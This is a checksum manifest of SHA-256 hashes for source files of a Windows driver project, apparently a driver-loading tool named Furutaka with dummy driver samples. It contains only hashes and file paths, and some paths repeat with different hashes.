c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln
2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj
4c86a0477e8f21e81bc6651bc06cea26241fc5b9a033e64c3cd843267fc98575 *Source\DummyDrv\dummy\main.c
14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv2\dummy.sln
f9a718ca087a1dce71638855837c464b190b7310f8e6715fc4471ed2b85af27d *Source\DummyDrv2\dummy\dummy.vcxproj
f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters
d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user
a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c
cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h
1e73ce5b6b079e6986509c218ce0880536b37c505056f831989e73b835c1cbbc *Source\DummyDrv2\dummy\main.c
f0732da25aa6b0a64eb0ebfc730c0902ed6fd1cc51f43f66813adbc5283de6ec *Source\DummyDrv2\dummy\main.h
10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c
e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c
6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h
24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln
16bd5cb1f9114683a8f5b91d8f5492319b64f5b1dd5103b56c9c29c39b06237b *Source\Furutaka\Furutaka.vcxproj
656a1ebfb8ca2b136b446d8bdeac9618d27ae1f6e06c08dee0d2fb8885b0e3a1 *Source\Furutaka\Furutaka.vcxproj
b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters
b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user
1a80c208b491fcd2704761490a12067ae8aa73d8bde834a20920cbd231affaf7 *Source\Furutaka\global.h
9b9f412b442a3a328693af6f6be5bc3f00b0723e49012e6395d3d5eb9184b078 *Source\Furutaka\global.h
94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c
33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h
c1747f460d8e42e18f3fce8c30c51be75fe382332f586756bbb86af81e8a5a45 *Source\Furutaka\main.c
2e0ae7d721d15facb6a63af2df430ce5a1d6250fdb78fc7511e24c23a2d73a9a *Source\Furutaka\main.c
8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h
fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h
2dad59a7d37bfc28fc1e0f3599584454084e5837649facde829373f41b86e08f *Source\Furutaka\resource.rc
f8cafd307ba14b60970fe8caf73fbb2f178d3877a3d8b51f507b431e3bf5506e *Source\Furutaka\shellcode.h
2ae545acec81745467b20da56f88a31df07de2021456d82dc16dbbe9ce0b3103 *Source\Furutaka\resource.rc
6f8ae02b3a6da025d5f918080e70245760d472dd5eb23fcc3964d425bee41336 *Source\Furutaka\shellcode.h
fd0fc26c051a852fe3eaf9cb44615543b92e642274fc1eb58b53f23457fd4e89 *Source\Furutaka\sup.c
059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h
12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h